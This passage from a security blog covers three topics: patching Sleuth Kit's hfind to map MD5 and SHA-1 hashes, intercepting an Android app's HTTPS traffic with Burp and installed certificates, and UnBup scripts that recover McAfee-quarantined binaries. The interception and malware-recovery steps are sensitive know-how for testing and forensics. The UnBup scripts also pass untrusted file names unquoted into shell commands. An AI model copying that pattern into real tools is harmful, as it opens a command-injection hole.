Generating a new hash databases that hold the hash value you want to map to in the data field for the file name is a solution that works. The solution however is not that flexible and requires a lot of extra disk space since the hashmap database will be at least the same size as the original database and the index approximately a third of the database size. Instead of trying to work around the issue with ‘hfind’ only printing the field that holds the file name, a much better solution to our problem would be to patch the program so it will present us with the corresponding MD5/SHA-1 hash instead.

To do so the first thing we need to do is to download The Sleuthkit, verify the downloaded file and extract the content. At the time of this writing, the latest stable version of TSK is 3.2.3.

pmedina@forensic:~$ tar -zxf sleuthkit-3.2.3.tar.gz
pmedina@forensic:~$ cd sleuthkit-3.2.3/



The next step is to run the ‘configure’ program to verify that all dependencies are installed and that all the programs that are required to compile the code are in place.

pmedina@forensic:~/sleuthkit-3.2.3$ ./configure
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... no
checking for mawk... mawk
..
..
config.status: creating tools/timeline/Makefile
config.status: creating tests/Makefile
config.status: creating samples/Makefile
config.status: creating man/Makefile
config.status: creating tsk3/tsk_config.h
config.status: executing depfiles commands
config.status: executing libtool commands
config.status: executing tsk3/tsk_incs.h commands
pmedina@forensic:~/sleuthkit-3.2.3$



The source code that handles the way ‘hfind’ prints the results when processing a database that is using the NSRL2 format is located in the file ‘tsk3/hashdb/nsrl_index.c’. This is the file that we need to patch so that ‘hfind’ will print the SHA1 and MD5 checksum instead of the filename.

pmedina@forensic:~/sleuthkit-3.2.3$ mv tsk3/hashdb/nsrl_index.c tsk3/hashdb/nsrl_index.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$ cat ../nsrl_index.c.patch
172,174c172
< &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3 +
< TSK_HDB_HTYPE_MD5_LEN + 3 + TSK_HDB_HTYPE_CRC32_LEN +
< 3];
---
> &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3];
331,333c329
< &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3 +
< TSK_HDB_HTYPE_MD5_LEN + 3 + TSK_HDB_HTYPE_CRC32_LEN +
< 3];
---
> &str[1];
pmedina@forensic:~/sleuthkit-3.2.3$ patch tsk3/hashdb/nsrl_index.c.ORIG -i ../nsrl_index.c.patch -o tsk3/hashdb/nsrl_index.c
patching file tsk3/hashdb/nsrl_index.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$




We also need to make sure that an error is returned if we are trying to use our patched ‘hfind’ binary on another database type but the one that are using the NSRL2 format. This is done by patching the file ‘tsk3/hashdb/tm_lookup.c’.

pmedina@forensic:~/sleuthkit-3.2.3$ cat ../tm_lookup.c.patch
1022c1022
< if (dbtype != 0) {
---
> /* if (dbtype != 0) { */
1024c1024
< tsk_errno = TSK_ERR_HDB_UNKTYPE;
---
> tsk_errno = TSK_ERR_HDB_UNSUPTYPE;
1026c1026
< "hdb_open: Error determining DB type (MD5sum)");
---
> "hdb_open: hashmap cannot work on DB type (MD5sum)");
1028c1028
< }
---
> /* } */
1032c1032
< if (dbtype != 0) {
---
> /* if (dbtype != 0) { */
1034c1034
< tsk_errno = TSK_ERR_HDB_UNKTYPE;
---
> tsk_errno = TSK_ERR_HDB_UNSUPTYPE;
1036c1036
< "hdb_open: Error determining DB type (HK)");
---
> "hdb_open: hashmap cannot work on DB type (HK)");
1038c1038
< }
---
> /* } */
pmedina@forensic:~/sleuthkit-3.2.3$ mv tsk3/hashdb/tm_lookup.c tsk3/hashdb/tm_lookup.c.ORIG^C
pmedina@forensic:~/sleuthkit-3.2.3$ patch tsk3/hashdb/tm_lookup.c.ORIG -i ../tm_lookup.c.patch -o tsk3/hashdb/tm_lookup.c
patching file tsk3/hashdb/tm_lookup.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$



Everything that is needed to modify ‘hfind’ is done and we can compile and test our binary.

pmedina@forensic:~/sleuthkit-3.2.3$ make
Making all in tsk3
..
..
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3/tsk3'
Making all in man
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3/man'
make[1]: Nothing to be done for `all'.
make[1]: Leaving directory `/home/pmedina/sleuthkit-3.2.3/man'
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3'
make[1]: Nothing to be done for `all-am'.
make[1]: Leaving directory `/home/pmedina/sleuthkit-3.2.3'
pmedina@forensic:~/sleuthkit-3.2.3$ sudo cp tools/hashtools/hfind /usr/local/bin/hashmap
pmedina@forensic:~/sleuthkit-3.2.3$ cd ..
pmedina@forensic:~$ hashmap /tmp/example-rds-unique.txt 2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25 d9c40dd2f1fb08927e773a0dc70d75fedd71549e
pmedina@forensic:~$ hashmap /tmp/example-rds-unique.txt d9c40dd2f1fb08927e773a0dc70d75fedd71549e
d9c40dd2f1fb08927e773a0dc70d75fedd71549e 2e54d3fb64ff68607c38ecb482f5fa25
pmedina@forensic:~$



As you can see above, instead of returning the name of the file that we find in our hash database, the other pair in the MD5 to SHA-1 or SHA-1 to MD5 hashmap is given to us. With this solution, we do not need to create an additional database and can use the existing index that we already have created.

Proxying Android 4.0 ICS and FS Cert Installer

$
0
0
By Paul Ambrosini.

The first step to testing Android applications is to inspect the application’s traffic. If the application uses SSL encryption, this requires forcing the app to use an intermediate proxy that allows us to grab, inspect, and possibly modify this traffic. Before Android 4.0 (Ice Cream Sandwich or “ICS”) was released, proxying an application was painful; the emulator was a better solution than a physical phone due to SSL certificate issues. Now that ICS is out and many devices have a working build (either from the manufacturer or third-party), it has become much easier to use an actual phone to test Android applications.

While testing Android applications, it quickly becomes apparent that the OS doesn't proxy traffic easily. Since most developers don't use the emulator and code must be specifically written for the emulator, proxying on the emulator can pose additional challenges- namely that the application simply might not work at all, or might not work properly. The --http-proxy setting used for the emulator tends to only work for the stock browser application; other applications generally ignore this setting. The second challenge is that a rooted emulator image is needed, which is possible but yet more effort. It’s ironically easier to root most physical devices than it is to root the standard emulator images (let alone to produce a new pre-rooted image.)

There are multiple solutions to this problem, but the best solution I've come cross is using the “ProxyDroid” app directly on a rooted ICS phone. This allows a tester to easily forward all traffic from the real application through a proxy; the only problem becomes SSL certificates, since the proxy will need to use its own SSL certificate, which Android will not recognize as valid.

For reference, here’s my phone setup (today - Kernel and ROM are regularly updated):


The rooting process is out of the scope of this article, but documentation can usually be found online. The process varies wildly from phone to phone. A good place to start would be the XDA Developer Forums; most devices have a forum dedicated to them, with a General section that usually contains a rooting guide. Rooting your device is your choice- I can't help with (or be held responsible for) issues that arise from a rooted phone.

In Android, unlike iOS, there is no setting for proxying traffic. Android 4.0 (ICS) added some tweaks to the wireless settings that are (slightly) hidden behind a long press on the currently-connected Wi-Fi network and then a check box for advanced options as seen below. (The “beware of Leopard” sign was dropped early in the Beta process.)



Unfortunately, this proxy setting is just like the --http-proxy setting of the emulator, which means it is completely useless for the actual proxying of applications. This leaves testers with the best option being a rooted phone with ProxyDroid running, which will force all traffic to use the proxy. Install the application from Google Play or from the developer’s XDA Developers thread. This will not solve all cases, but applications will happily comply.

An intercepting proxy running on a computer on the same network (or accessible via the Internet, but this is probably a bad idea). This article uses the free version of Burp Suite running on a BackTrack 5 VM, but if you have a preferred intercepting proxy, it should work, too.

Initial proxy setup

A backtrack VM has all the needed tools in this case, so Burp was started from the BT5 VM. The VM was set to bridged mode as to be on the same network as the phones wireless. The Burp proxy options were as shown here:



Take note of the IP address on the VM as this will be needed soon. Pay particular attention to Burp’s server SSL certificate option, as these are particularly important.

Next, start ProxyDroid on the mobile device and allow it root privileges when asked. ProxyDroid requires root, since it uses iptables (the Linux firewall) to modify packet routing on the device. Set ProxyDroid’s Host to the Burp IP and the configured port (default 8080) and then enable the proxy.



Finally, test proxying with the basic browser on the phone. Browse to something simple like http://www.google.com and the traffic should show up in Burp.



If there is no traffic showing, ensure the proxy is configured to listen on all interfaces (i.e., that “loopback only” is disabled) and that the IP/port settings in ProxyDroid are correct. If these settings seem correct, verify that the phone’s Wi-Fi is set to the same network as the machine running Burp. ProxyDroid should also be checked to make sure the IP/port settings are correct and that the app is enabled. When ProxyDroid is enabled, a cloud icon will show in the top left of the phone to let you know that it’s running.

With the phones browser now set to proxy through Burp, let's test what happens with an SSL encrypted connection to Google; navigate to https://www.google.com.



Pressing OK and then Continue will allow the browser to ignore the certificate warnings and load the page. Now we can see the browser’s SSL traffic, but what happens if an application attempts to access an HTTPS site?

Application Proxying

In order to test application proxying, we need an application. I've created a very simple app that creates an HTTPS connection to Foundstone’s website. The app will attempt to connect; if it succeeds, it will change the text in the app to the html response source. If not, the application will print a debug message to the log.

The application can be downloaded from here, which will require that your phone allows non-market apps (Settings > Security > Unknown Sources) to be installed be enabled on your device:


The source code can be seen here (in case you don’t trust me):


To fully understand how this application works, I would suggest loading the source code in Eclipse (with the ADT Plug-in and running the code from there. For this test, it’s helpful to be able to view the phone’s system log, either using an attached computer with the Android SDK installed, or a specialized application on the device (for which there are many options).

First, let's start ‘adb logcat’ with a filter for “FS”. A debug log tag is commonly used to find specific log messages that are sent by the application. The test app uses the tag “FSFSFSFSFSFSFSFSFS”, so filtering for FS will do.

Windows command:
adb logcat | findstr FS



Linux command:
adb logcat | grep FS



Here's what the install result looks like when using Linux:
$ adb logcat | grep FS
W/ActivityManager( 3841): No content provider found for permission revoke: file:///data/local/tmp/FS SSL App Test.apk



In another terminal, install the application. This command should be the same in either Windows or Linux, as long adb is in the path.

$ adb install FS\ SSL\ App\ Test.apk
239 KB/s (10513 bytes in 0.042s)
pkg:/data/local/tmp/FS SSL App Test.apk
Success



With the application installed and logcat running, let's first turn off ProxyDroid and test the application. The application should produce several log messages in the logcat window. These messages are for debug purposes to help step through testing of the application. The application will also change its text to the response received from the server, as shown below.



Now that we can see the application working, it's time to figure out how to insert our proxy in front of the application. Go back and enable ProxyDroid once again. Attempting to run the application again with ProxyDroid turned on causes an SSL error:
$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [-] EXCEPTION: javax.net.ssl.SSLHandshakeException: java.security.cert.CertPathValidatorException: Trust anchor for certification path not found.



The detailed error is:
EXCEPTION: javax.net.ssl.SSLHandshakeException: java.security.cert.CertPathValidatorException: Trust anchor for certification path not found.



“Trust anchor” in this instance is referring to a pre-accepted CA certificate that can be used to validate the SSL certificate. In other words, the certificate is not signed by a valid CA. This is not unexpected- Burp Suite has generated the certificate and signed it using its internal, randomly-generated CA certificate.

By configuring Firefox to use Burp as its proxy, we can easily see what the certificate chain looks like. Navigate to an SSL-protected page, select Tools -> Page Info, and click the ‘Security’ icon in the top row, and click the ‘View Certificate’ button. You should be presented with a screen like that below.



As the image shows, “PortSwigger CA” is the signing authority for the certificate for “www.foundstone.com”. The phone doesn't have this CA (not least because it’s randomly generated on first run by Burp Suite), so we need to add it, which allow us to decrypt SSL traffic sent by our Android apps.

Still in Firefox, switch to the details tab select “PortSwigger CA” is selected in the “Certificate Hierachy” tree and then click “Export”. Export the file as an X.509 Certificate (DER) file and set the filename to PortSwiggerCA.cer. Android only reads files X.509 Certificates with a .CER extension when loading certificates from the SD card.



Finally, push the .CER file to the phone’s SD card using adb push, just like with any other file:
$ adb push PortSwiggerCA.cer /sdcard/
30 KB/s (712 bytes in 0.23s)



With the certificate file saved on the phone, install it into the certificate pool navigating to Settings -> Security -> Install from SD card. The install process will prompt you for the device lock code, as this is what Android uses to help secure the certificate. If there is no lock code or pin currently configured, you will be asked to create one.

Now that the CA certificate is installed on the phone, attempt to run the test application again, and observe the output in logcat.
$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [-] EXCEPTION: java.io.IOException: Hostname 'www.foundstone.com' was not verified



The detailed error is:
EXCEPTION: java.io.IOException: Hostname 'www.foundstone.com' was not verified



Your first thought might be to go back to Firefox and grab the “www.foundstone.com” certificate from the detail tab, in the same manner that we obtained the PortSwigger CA certificate, but that actually won't work. It appears that the default HttpsURLConnection in Android can sometimes cause an exception when using the default HostnameVerifier. Searching for this issue I found some info here which talks about just using a different HostnameVerifier. Depending on the application this could cause an exception or be completely ignored, in my case my application used the default verifier and I would have to install a site certificate as well.

The easiest fix from the tester perspective is to reconfigure Burp to use a fixed certificate. Go back to Burp and edit the settings for the proxy listener. In the “server SSL certificate” section, select the option “generate a CA-signed certificate with a specific hostname.” The specific hostname for this test will be “www.foundstone.com”. Be sure to click “edit” prior to making the change and “update” afterwards. Just prior to clicking “update,” Burp should look similar to the image below.



Return to Firefox and refresh the https://www.foundstone.com page; a new certificate error should appear. Follow the same process as above to export the certificate, except that this time be sure to export the “www.foundstone.com” certificate instead of the “PortSwigger CA” certificate. Remember to change the format to X.509 Certificate (DER) and to save it with a .CER extension (for example, www.foundstone.com.cer).

$ adb push www.foundstone.com.cer /sdcard/
11 KB/s (616 bytes in 0.051s)



As before, navigate to Settings -> Security -> Install from SD card and install the www.foundstone.com certificate.

Finally, double-check that ProxyDroid is still running then run the test application again.

$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Create a buffered reader to read the response...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Read all of the return....
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS




The Android application should display the HTML loaded from the page after being run successfully.



Burp will show the site being connected to by IP, as shown below.



Success!

Some notes

Where do we go from here? We were able to successfully proxy traffic for this test application, but actual applications may present other difficulties. When testing any application some key points of information will be required- most important being which URL the application talk to. In the example case, we've used “www.foundstone.com” and, thus, created a specific host certificate for this site. For each new application and URL, Burp will need to be re-set to generate a site-specific certificate for the URL in use.

One other way to deal with this proxying issue is to decompile the application and do code replacement before recompiling the application. Foundstone provides an example application, part of its Hacme series, and also some documentation on performing class replacement. Performing class replacements like this can be tedious and frustrating, however, so it should be considered only in cases where the application cannot be coerced to proxy via more usual means.

A Better Way - FS Cert Installer

After going through this a couple times I didn’t want to deal with installing the certificates over and over so I wrote a small application to handle installing them. The application takes the URL, proxy IP and proxy port and then will allow the user to install the CA or site certificate. For the “hostname was not verified issue” Burp will still need to be changed before the certificate is installed.



Download: Usage instructions:
  1. Install the application using the market or the apk file from github.
  2. Set the URL, proxy IP and proxy port.
  3. Install the CA certificate which will most likely be the Burp certificate. Name it anything and enter the lock pin or pattern used on the phone. The pin or pattern is used here by the KeyChain activity not the installer app.
  4. Change the certificate on Burp to generate a certificate with a specific hostname. Install the site certificate.
  5. Test your application!


One large issue I ran into making this application deals with testing the certificate chain. The test certificate chain button will run the test with or without a proxy (if the IP and port are blank). I set up the application this way because a user might be testing or installing certificates with ProxyDroid running and the application should handle that just fine. The issue arises when a user wants to test the certificate chain after installing the CA certificate. The application will also tell the user the site certificate is installed and the full certificate chain is working. This is due to the fact that the class HttpsUrlConnection.openConnectiong(proxy) does not cause the same IOException Hostname Verifier issue as it would without a proxy set. Unfortunately there isn’t a fix for this issue, as far as I’m aware. The code is part of the JDK in javax.net.ssl. I am purposely using this class because it was recommended by the Android developer blog here, the apache HttpClient doesn’t throw the error anyway.

As a final note to remember, some applications won’t need the site certificate and watching logcat will be the best way to figure out what’s happening. Stack traces are your friend!

UnBup - McAfee BUP Extractor for Linux

$
0
0
By Tony Lee and Travis Rosiek.

These days, antivirus is a must-have due to the ubiquity of adware, malware, viruses, and worms—yes, even if you are running a Mac. ;) Antivirus does a good job catching the low hanging fruit and other annoyances, but have you ever wondered what happens to the files that the A/V catches? Typically, antivirus engines will deactivate the suspected virus and then store an inert (encoded) copy in a quarantine folder to prevent accidental execution. McAfee’s VirusScan will allow you to restore the binary; however in all scenarios using VirusScan may not be ideal. This article will take you through the process of recovering the quarantined binary and metadata surrounding it. But why would you want to do this? Potentially for the following reasons:
  1. You are a corporate A/V administrator and A/V misidentified a user’s file
  2. You are a malware analyst and would like to dissect the detected binary
  3. You are a home user and A/V grabbed a file you wanted (think netcat or a sysinternals tool) and the restore function did not work

As a bonus, at the bottom of the article, we have included a bash shell script and (faster) Perl script to break apart McAfee BUPs from within a Linux environment. We wrote these scripts because we could not find a Linux BUP tool. It was prototyped in bash because it was quick to code and it removed as many dependencies as possible. Unfortunately, bash bitwise Exclusive or (XOR) was too slow and the tool was rewritten in (well-commented) Perl.

In case you are not familiar with the binary operation XOR, a truth table is provided below:



Note that an output of 1 is only produced for an odd amount of 1’s on the input.

How McAfee deactivation works

McAfee VirusScan, like other antivirus engines, will deactivate the binary and store an inert copy in a pre-defined location. McAfee appears to deactivate the binary by doing the following:
  1. Creates a metadata text file
  2. Performs a bitwise XOR on the metadata file and binary with a well-known key (0x6A)
  3. Combines the original binary and metadata text file into a single file using Microsoft’s compound document format
  4. Stores the file (with .BUP extension) in a quarantine folder defined by the Quarantine Manager Policy (default is C:\QUARANTINE\)
You can check the path of the quarantine folder by right clicking on the McAfee shield -> VirusScan Console -> Quarantine Manager Policy.



Triggering Antivirus to Create a BUP

For this demonstration, we will be using the test file for Global Threat Intelligence (GTI - formerly known as Artemis). This test file is similar to the EICAR antivirus test file, but it triggers a heuristic detection for McAfee VirusScan. You could also use John the Ripper, Cain, netcat, pwdump, or other common hack tools to trigger an A/V event.

You can read more about the test file from the How to verify that GTI File Reputation is installed correctly and that endpoints can communicate with the GTI server McAfee KnowledgeBase article.

A direct link to the test file:

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/53000/KB53733/en_US/ArtemisTest.zip
The password is to unzip the file is: password

If On-Access detection does not detect the file right away, right-click and scan to activate an On-Demand scan. We disabled the On-Access protection in order to run a hash on the binary and provide it for your convenience. SHA1 would normally be used as MD5 has a chance of collisions—however, MD5 hashes are sufficient for our purposes in this demo.

 $ md5sum.exe ArtemisTest.exe
5db32a316f079fe7947100f899d8db86 *ArtemisTest.exe



Now, after re-enabling On-Access scan and we have a detection:



Now we check the quarantine folder defined in Quarantine Manager Policy shown above and eureka! We have a .BUP file:



If this file did not trigger, you may not have GTI enabled. Try to first enable GTI or use another known-safe, yet detected, binary to generate the BUP file.

Extracting the BUP in Windows

To extract the BUP in Windows, I followed the helpful How to restore a quarantined file not listed in the VSE Quarantine Manager McAfee KnowledgeBase article.

Requirements:
  • 7-zip (Used to decompress the Microsoft compound document format)
  • Bitwise XOR binary such as: xor.exe

If you are extracting the BUP on the same computer that your McAfee antivirus is running on, make sure you disable On-Access scan or exclude the target folder from scans.

Use 7-zip to extract the file by right clicking it, selecting 7-Zip, then Extract Here.



The results should be two files:
  • Details
  • File_0

 $ md5sum.exe Details
c0bb879bdfd5b5277fc661da602f7460 *Details

$ md5sum.exe File_0
02ab0a6723bca2e8b6b70571680210a9 *File_0



Now, use the xor.exe binary to perform a bitwise XOR against the key (0x6A) in order to obtain two new files. Feel free to use the following syntax in a command prompt:

 C:\QUARANTINE>xor.exe Details Details.txt 0X6A

C:\QUARANTINE>xor.exe File_0 Captured.exe 0X6A





If you would like to restore the original file name to the binary, just look at the metadata from Details.txt. The most useful items that we see in the metadata are the following:
  • A/V detection name - Useful for discovering more information about the detection
  • Major and minor versions of A/V engine - Can be used to troubleshoot why some hosts detect and others miss
  • Major and minor versions of A/V DATs - Can be used to troubleshoot why some hosts detect and others miss
  • When the file was captured (Creation fields) - Helps you create a timeline if detected by On-Access scan
  • Time zone of host - Useful for timeline
  • Original file name - Often reveals a good amount of information about the binary

Snippet of Details.txt:

 [Details]
DetectionName=Artemis!5DB32A316F07
DetectionType=0
EngineMajor=5400
EngineMinor=1158
DATMajor=6771
DATMinor=0
DATType=2
ProductID=12106
CreationYear=2012
CreationMonth=7
CreationDay=14
CreationHour=13
CreationMinute=25
CreationSecond=18
TimeZoneName=Eastern Daylight Time
TimeZoneOffset=240
NumberOfFiles=1
NumberOfValues=5

--snip—

[File_0]
ObjectType=5
OriginalName=C:\USERS\REDACTED\DESKTOP\ARTEMISTEST.EXE
WasAdded=0




Now that you have the original file, you can restore it, reverse it, or whatever your heart desires.

But first let’s make sure the hash from the original file matches with the hash before deactivation. For completeness, we will also provide the hash for Details.txt.

 $ md5sum.exe Captured.exe
5db32a316f079fe7947100f899d8db86 *Captured.exe <- This matches

$ md5sum.exe Details.txt
46c09e5ba29658a69527ca32c6895c08 *Details.txt




Extracting the BUP in Linux

We just detailed the process to recover the binary from a BUP in Windows. You can perform this same process in Linux if you have 7zip and Wine (used to run the xor.exe binary). However, the goal of this tool was to automate the process, add some features, and remove the Wine dependency.

The UnBup Tool

The first thing you should know about UnBup is the usage menu:
 Usage:  UnBup.sh [option] 

-d = details file only (no executable)
-h = help menu
-s = safe executable (extension is .ex)

Please report bugs to Tony.Lee@Foundstone.com and Travis_Rosiek@McAfee.com


  1. No options - Yields the Details.txt and original binary
  2. - d option - Yields the Details.txt file only (No binary)
  3. - s option - Yields the Details.txt file and the binary, with an extension of .ex to prevent accidental execution

Demo: No Options

 UnBup.sh file.bup


Supplying UnBup with no options and just the BUP file produces the details.txt file and the binary. Note that the MD5 hashes are the same as what was seen in the Windows section.



Demo: The -d Option

 UnBup.sh -d file.bup


The -d option is useful for those who may not want to reverse or dig into the binary—but would like a little more information around the detection.



Demo: The -s Option

 UnBup.sh -s file.bup


The -s option is not a foolproof measure to prevent execution of the binary, however it can help prevent accidental execution. In this case, since we are extracting Windows malware in a Linux environment, this adds another level of protection as it is harder (if not impossible) to cross infect a different operating system.



How it works (simplistically)

If you look at the supplied bash code below and think: “This must be a backdoor, there is no way I am going to run it on my box…”, then the screenshot below is directed at you.

The binary math in bash was the most annoying part of the process, but it was the most important. Here is the breakdown of each step:
  1. xxd to convert the binary to hex
  2. Performing the XOR
  3. Converting the decimal result to hex
  4. The step to convert hex to ASCII is to show you the readable output (not performed in script)



The Shell Script – (SLOW – You may want to use the Perl code below)

Download it here: https://raw.github.com/OpenSecurityResearch/unbup/master/UnBup.sh

In case, file download is blocked, feel free to copy and paste it from here:

#!/bin/bash
# UnBup
# Tony Lee and Travis Rosiek
# Tony.Lee-at-Foundstone.com
# Travis_Rosiek-at-McAfee.com
# Bup Extraction tool - Reverse a McAfee Quarantined Bup file with Bash
# Input: Bup File
# Output: Details.txt file and original binary (optional)
# Note: This does not put the file back to the original location (output is to current directory)
# Requirements - 7z (7zip), xxd (hexdumper), awk, cut, grep

##### Function Usage #####
# Prints usage statement
##########################
Usage()
{
echo "UnBup v1.0
Usage: UnBup.sh [option]

-d = details file only (no executable)
-h = help menu
-s = safe executable (extension is .ex)

Please report bugs to Tony.Lee-at-Foundstone.com and Travis_Rosiek-at-McAfee.com"
}

# Detect the absence of command line parameters. If the user did not specify any, print usage statement
[[ -n "$1" ]] || { Usage; exit 0; }


##### Function XorLoop #####
# Loop through files to perform bitwise xor with key write binary to file
############################
XorLoop()
{
for byte in `xxd -c 1 -p $INPUT`; do # For loop converts binary to hex 1 byte per line
#echo "$byte"
decimal=`echo $((0x$byte ^ 0x6A))` # xor with 6A and convert to decimal
#echo "decimal = $decimal"
hex=`echo "obase=16; $decimal" | bc` # Convert decimal to hex
#echo "hex = $hex"
echo -ne "\x$hex" >> $OUTPUT; # Write raw hex to output file
done
}


##### Function CreateDetails #####
# Create the Details.txt file with metadata on bup'd file
##################################
CreateDetails()
{
# Check to see if the text file exists, if not let the user know
[[ -e "$BupName" ]] || { echo -e "\nError: The file $BupName does not exist\n"; Usage; exit 0; }
echo "Extracting encoded files from Bup";
7z e $BupName > /dev/null; # Extract the xor encoded files (Details and File_0)
INPUT=Details; # Set INPUT variable to the Details file to get the details and filename
OUTPUT=Details.txt; # Set OUTPUT variable to Details.txt filename
echo "Creating the Details.txt file";
XorLoop; # Call XorLoop function with variables set
}


##### Function ExtractBinary #####
# Extracts the original binary from the bup file
##################################
ExtractBinary()
{
Field=`grep OriginalName Details.txt | awk -F '\' '{ print NF }'`; # Find the binary name field
OUTNAME=`grep OriginalName Details.txt | cut -d '\' -f $Field`;
OUTPUT=`echo "${OUTNAME%?}"`; # Get rid of trailing /r
INPUT=File_0;
echo "Extracting the binary";
XorLoop; # Call xor function again
}

# Parse the command line options
case $1 in
-d) BupName=$2; CreateDetails;;
-h) Usage; exit 0;; # Details.txt file only
-s) BupName=$2; CreateDetails; ExtractBinary; mv $OUTPUT `echo "${OUTPUT%?}"`;; # Safe binary
*) BupName=$1; CreateDetails; ExtractBinary;; # Full process of the bup
esac

rm Details File_0; # Clean up xor'd files





Our Perl script (MUCH FASTER – You probably want to use this over the shell script)

When processing small files like the Artemis test file, bash shell scripting worked just fine. However, when processing larger executables, the XOR process was too time consuming. We searched for a simple XOR Perl script on-line, but did not find anything to fit what we were looking for so we wrote our own.

xor.pl Usage:
 ./xor.pl
Simple xor script
Usage: ./xor.pl [Input File] [Output File]

Tony.Lee@Foundstone.com
./xor.pl 7dc7ed19123df0.bup 7dc7ed19123df0.xord



Download : https://raw.github.com/OpenSecurityResearch/unbup/master/xor.pl

  #!/usr/bin/perl
# Simple xor decoder
# Written because I could not find one on the Intertubes
# Email me with problems at Tony.Lee-at-Foundstone.com

# Detection to make sure there are two arguments supplied (an input file and output file)
if (@ARGV < 2) {
die "Simple xor script\n Usage: $0 <Input File> <Output File>\n\nTony.Lee-at-Foundstone.com\n";
}

# Open input file as read only to avoid accidentally modifying the file
open INPUT, "<$ARGV[0]" or die "Input file \"$ARGV[0]\" does not exist\n";

# Open the output file to write to it
open OUTPUT, ">$ARGV[1]" or die "Cannot open file \"$ARGV[1]\"";

# Loop until all bytes in the file are read
while (($n = read INPUT, $byte, 1) != 0)
{
$decode = $byte ^ 'j'; # xor byte against ASCII 'j' = Hex 0x6A = Dec 106
print OUTPUT $decode; # write the decoded output to a file
}

close INPUT;
close OUTPUT;



After writing the XOR Perl script, we converted the Bash script to Perl to speed the process up.

UnBup.pl

Download : https://raw.github.com/OpenSecurityResearch/unbup/master/UnBup.pl

  #!/usr/bin/perl
# UnBup
# Tony Lee and Travis Rosiek
# Tony.Lee-at-Foundstone.com
# Travis_Rosiek-at-McAfee.com
# Bup Extraction tool - Reverse a McAfee Quarantined Bup file with Bash
# Input: Bup File
# Output: Details.txt file and original binary (optional)
# Note: This does not put the file back to the original location (output is to current directory)


# Detect the absence of command line parameters. If the user did not specify any, print usage statement
if (@ARGV == 0) { Usage(); exit(); }


##### Function Usage #####
# Prints usage statement
##########################
sub Usage
{
print "UnBup v1.0
Usage: UnBup.pl [option]

-d = details file only (no executable)
-h = help menu
-s = safe executable (extension is .ex)

Please report bugs to Tony.Lee-at-Foundstone.com and Travis_Rosiek-at-McAfee.com\n"
}


##### Function XorLoop #####
# Loop through files to perform bitwise xor with key write binary to file
# Input arguments input filename and output filename
# example: XorLoop(Details, Details.txt)
############################
sub XorLoop
{
# Open input file as read only to avoid accidentally modifying the file
open INPUT, "<$_[0]" or die "Input file \"$_[0]\" does not exist\n";

# Open the output file to write to it
open OUTPUT, ">$_[1]" or die "Cannot open file \"$_[1]\"";

# Loop until all bytes in the file are read
while (($n = read INPUT, $byte, 1) != 0)
{
$decode = $byte ^ 'j'; # xor byte against ASCII 'j' = Hex 0x6A = Dec 106
print OUTPUT $decode; # write the decoded output to a file
}

close INPUT;
close OUTPUT;
}

##### Function CreateDetails #####
# Create the Details.txt file with metadata on bup'd file
##################################
sub CreateDetails
{
$BupName=$_[0];
# Check to see if the text file exists, if not let the user know
unless(-e "$BupName") { print "\nError: The file \"$BupName\" does not exist\n"; Usage; exit 0; }
print "Extracting encoded files from Bup\n";
`7z e $BupName`; # Extract the xor encoded files (Details and File_0)
print "Creating the Details.txt file\n";
XorLoop("Details", "Details.txt"); # Call XorLoop function with variables set
}

##### Function ExtractBinary #####
# Extracts the original binary from the bup file
##################################
sub ExtractBinary
{
$Field=`grep OriginalName Details.txt | awk -F '\\' '{ print NF }'`; # Find the binary name field
$OUTNAME=`grep OriginalName Details.txt | cut -d '\\' -f $Field`; # Find the binary name
$INPUT=File_0;
print "Extracting the binary\n";
XorLoop("$INPUT", "$OUTNAME"); # Call xor function again
}



if ($ARGV[0] eq "-d"){ # Print details file only
CreateDetails($ARGV[1]);
`rm Details File_0`; # Clean up original files
}
elsif ($ARGV[0] eq "-h"){ # Print usage statement
Usage();
}
elsif ($ARGV[0] eq "-s"){ # Create "safe" binary
CreateDetails($ARGV[1]);
ExtractBinary();
chop($OUTNAME);
$OLD=$OUTNAME; # Store original name in $OLD variable
chop($OUTNAME);
chop($OUTNAME);
`mv $OLD $OUTNAME`; # Rename the binary to remove that last E
`rm Details File_0`; # Clean up original files
}
else {
CreateDetails($ARGV[0]); # Extract details file and binary
ExtractBinary();
`rm Details File_0`; # Clean up original files
}




Final thoughts and coding challenge

